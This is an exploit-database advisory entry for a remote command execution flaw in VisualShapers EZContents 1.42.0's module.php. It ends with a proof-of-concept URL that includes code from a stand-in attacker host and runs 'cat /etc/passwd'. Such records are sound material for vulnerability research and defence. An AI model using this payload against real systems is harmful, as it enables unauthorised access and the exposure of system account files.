VisualShapers EZContents 1.42.0 - module.php Remote Command Execution

2004-01-10T00:00:00
ID EXPLOITPACK:02B886CFB8B7C95A520C166154BEF8FC
Type exploitpack
Reporter Zero X
Modified 2004-01-10T00:00:00

Description

VisualShapers EZContents 1.42.0 - module.php Remote Command Execution

                                        
                                            source: https://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd